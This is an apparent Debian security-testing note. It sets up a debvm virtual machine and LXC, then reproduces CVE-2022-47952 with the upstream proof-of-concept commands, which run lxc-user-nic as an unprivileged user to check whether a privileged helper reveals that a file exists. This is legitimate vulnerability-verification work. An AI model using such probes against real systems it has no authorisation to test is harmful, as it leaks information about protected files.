===
LXC
===

VMs setup
---------

This test relies on debvm.

`apt-cacher-ng` is also running on my host machine. Adjust MIRROR URL if not
is your case.

.. code:: sh

   export RELEASE=buster
   debvm-create --size=3GB --release=$RELEASE -- http://192.168.122.1:3142/deb.debian.org/debian
   debvm-run

LXC
---

From https://wiki.debian.org/LXC:

.. code:: sh

   apt-get install lxc libvirt0 libpam-cgfs bridge-utils uidmap iptables

Enable the lxcbr0 simple bridge:

.. code:: sh

   echo 'USE_LXC_BRIDGE="true"' > /etc/default/lxc-net

   systemctl restart lxc
   systemctl restart lxc-net

Basic test
^^^^^^^^^^

.. code:: sh

   lxc-create -n test -t debian -- -r buster
   lxc-start -n test
   lxc-attach -n test

Inside the container:

.. code:: sh

   apt-get update

CVE-2022-47952
^^^^^^^^^^^^^^

PoC is described in the patch commit:

.. code:: sh

   mkdir -p /l/h
   touch /l/h/t
   useradd -m debian
   su -l debian
   debian@testvm:~$ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic delete lol lol /l/h/t h h
   cmd/lxc_user_nic.c: 1181: main: Failed while opening netns file for "/l/h/t"

If vulnerable, the last command should return:

.. code:: sh

   cmd/lxc_user_nic.c: 1101: main: Path "/l/h/t" does not refer to a network namespace path <---- file exist!

| Copyright (C) 2023  Santiago Ruano Rincón
